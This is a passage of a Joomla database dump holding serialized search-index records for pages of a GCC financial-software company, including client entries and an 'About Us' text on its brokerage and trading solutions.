no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"6\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:18:\"111:business-pages\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:35:\"index.php/84-uae/111-business-pages\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=111\";s:5:\"route\";s:87:\"index.php?option=com_content&view=article&id=111:business-pages&catid=84:uae&Itemid=435\";s:5:\"title\";s:3:\"DFM\";s:11:\"description\";s:3:\"DFM\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(24,'index.php?option=com_content&view=article&id=98','index.php?option=com_content&view=article&id=98:lazy-loader&catid=84:uae&Itemid=435','Al Ramz','Ramz','2015-03-15 03:53:42','ce8c0b4b854e8efc61f56193ae9801a3',1,1,1,'en-GB','2013-12-18 09:35:50','0000-00-00 00:00:00','2013-12-18 09:35:50','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:2:\"98\";s:5:\"alias\";s:11:\"lazy-loader\";s:7:\"summary\";s:11:\"<p>Ramz</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-03-15 07:53:42\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"5\";s:8:\"ordering\";s:1:\"1\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:14:\"98:lazy-loader\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:31:\"index.php/84-uae/98-lazy-loader\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=article&id=98\";s:5:\"route\";s:83:\"index.php?option=com_content&view=article&id=98:lazy-loader&catid=84:uae&Itemid=435\";s:5:\"title\";s:7:\"Al Ramz\";s:11:\"description\";s:4:\"Ramz\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2013-12-18 09:35:50\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-12-18 09:35:50\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(25,'index.php?option=com_content&view=article&id=95','index.php?option=com_content&view=article&id=95:html5-and-css3&catid=84:uae&Itemid=435','national bank of abu dhabi','national bank of abu dhabi','2015-03-15 03:55:24','f36a83c055fe75fe336ae7e7ce62cdd0',1,1,1,'en-GB','2013-12-18 09:31:34','0000-00-00 00:00:00','2013-12-18 09:31:34','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:2:\"95\";s:5:\"alias\";s:14:\"html5-and-css3\";s:7:\"summary\";s:33:\"<p>national bank of abu dhabi</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-03-15 07:55:23\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"9\";s:8:\"ordering\";s:1:\"2\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:17:\"95:html5-and-css3\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:34:\"index.php/84-uae/95-html5-and-css3\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=article&id=95\";s:5:\"route\";s:86:\"index.php?option=com_content&view=article&id=95:html5-and-css3&catid=84:uae&Itemid=435\";s:5:\"title\";s:26:\"national bank of abu dhabi\";s:11:\"description\";s:26:\"national bank of abu dhabi\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2013-12-18 09:31:34\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-12-18 09:31:34\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(35,'index.php?option=com_content&view=article&id=84','index.php?option=com_content&view=article&id=84:about-us&catid=79:pages&Itemid=678','About Us','Established in 1999, FIRST Information Technology (FIT) is a software solutions provider based in the GCC with offices in Oman, UAE and Jordan, partners in Saudi Arabia, Qatar, Egypt and Syria. Focused on the financial services products - markets sector -','2015-04-08 04:43:16','4575137c699c4c0087191d7699b14da8',1,1,1,'en-GB','2013-12-09 05:09:51','0000-00-00 00:00:00','2013-12-09 05:09:51','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:2:\"84\";s:5:\"alias\";s:8:\"about-us\";s:7:\"summary\";s:5842:\"<p style=\"text-align: justify;\"><span style=\"color: #000000; font-family: Times New Roman; font-size: medium;\"> </span><span lang=\"EN-GB\" style=\"line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\"><span style=\"color: #000000;\">Established in 1999, <strong>FIRST Information Technology (FIT)</strong> is a software solutions provider based in the GCC with offices in Oman, UAE and Jordan, partners in Saudi Arabia, Qatar, Egypt and Syria. Focused on the financial services products - markets sector - mainly investment management solutions (brokerage, fund management, portfolio management, order management solution, risk management, index management, information dissemination and other industry specific solutions)</span></span></p>\r\n<p style=\"text-align: justify;\"><span lang=\"EN-GB\" style=\"color: black; line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\">FIT as a leader solution provider in the region, has the largest portfolio clients based in the GCC. <strong>FIT</strong> was the first provider hits the Trading Engine for Muscat, Dubai, Abu Dhabi, NASDAQ Dubai, Qatar, Jordan and Damascus Stock Exchanges.</span></p>\r\n<p style=\"text-align: justify;\"><span lang=\"EN-GB\" style=\"color: black; line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\">The core solutions provided by </span><b><span lang=\"EN-GB\" style=\"color: blue; line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\">FIT</span></b><span lang=\"EN-GB\" style=\"color: black; line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\"> offer the widest breadth of functionality in the region.<span style=\"mso-spacerun: yes;\"> </span>The functionality encompasses the following: brokerage management, portfolio management, fund management, research, order management, index management, FIX protocol, STP integration, portals, and internet / mobile trading, risk management, VIP service centre.</span></p>\r\n<p style=\"text-align: justify;\"><span lang=\"EN-GB\" style=\"color: black; line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\">FIT is working closely with the regional stock exchanges either as consultant or solution provider such as Dubai Financial Market portal, information dissemination website, Muscat Securities Marker website and Khartoum Stock Exchange trading engine. </span></p>\r\n<p> </p>\r\n<p><span style=\"color: #632423; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 16pt; mso-bidi-font-family: Tahoma; mso-themecolor: accent2; mso-themeshade: 128;\"><span style=\"color: #632423; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 16pt; mso-bidi-font-family: Tahoma; mso-themecolor: accent2; mso-themeshade: 128;\"><strong><span style=\"text-decoration: underline;\">Vision</span></strong></span></span></p>\r\n<table style=\"border-collapse: collapse; width: 1343pt;\" border=\"0\" width=\"1790\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"height: 15.0pt;\">\r\n<td style=\"height: 15.0pt; width: 1343pt;\" width=\"1790\" height=\"20\">\r\n<p style=\"padding-left: 30px;\"> <span style=\"color: black; font-family: \'Britannic Bold\',\'sans-serif\'; mso-bidi-font-family: Tahoma; mso-bidi-font-size: 12.0pt;\"><span style=\"font-size: medium;\">Be the regional selected choice of technology partner in delivering Brokerage & Financial Investment Applications.</span></span></p>\r\n<p style=\"padding-left: 30px;\"> </p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"color: #632423; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 16pt; mso-bidi-font-family: Tahoma; mso-themecolor: accent2; mso-themeshade: 128;\"><strong><span style=\"text-decoration: underline;\">Mission</span></strong></span></p>\r\n<table style=\"border-collapse: collapse; width: 1343pt;\" border=\"0\" width=\"1790\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"height: 15.0pt;\">\r\n<td style=\"height: 15pt; width: 1343pt; padding-left: 30px;\" width=\"1790\" height=\"20\">\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"> </p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"><span style=\"color: black; font-family: \'Britannic Bold\',\'sans-serif\'; mso-bidi-font-family: Tahoma; mso-bidi-font-size: 12.0pt;\"><span style=\"font-size: medium;\">Provide better services to enhance the operational efficiency of our clients. This statement served as a cornerstone for maximizing the added value we deliver to our clients.</span></span></p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"><span style=\"font-family: Times New Roman; font-size: medium;\"> </span></p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"><span style=\"color: black; font-family: \'Britannic Bold\',\'sans-serif\'; mso-bidi-font-family: Tahoma; mso-bidi-font-size: 12.0pt;\"><span style=\"font-size: medium;\">Having this in mind and in order to bring the state of art technology to our region, we established the FIRST Information Technology FIT to achieve those goals among others. We look at information and data of any enterprise as part of its valuable assets, so it has to be preserved, maintained, and fully taken care off. By providing Investment solutions to the enterprise, we believe we will accomplish our mission. The systems and software applications that we developed take care of the current needs as well as the future expansions and requirements without loosing the investment in both hardware and software.</span></span></p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"><span style=\"font-family: Times New Roman; font-size: medium;\"> </span></p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"> </p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"79\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-04-08 08:43:16\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:2:\"25\";s:8:\"ordering\";s:1:\"8\";s:8:\"category\";s:5:\"Pages\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:11:\"84:about-us\";s:7:\"catslug\";s:8:\"79:pages\";s:6:\"author\";s:10:\"Super 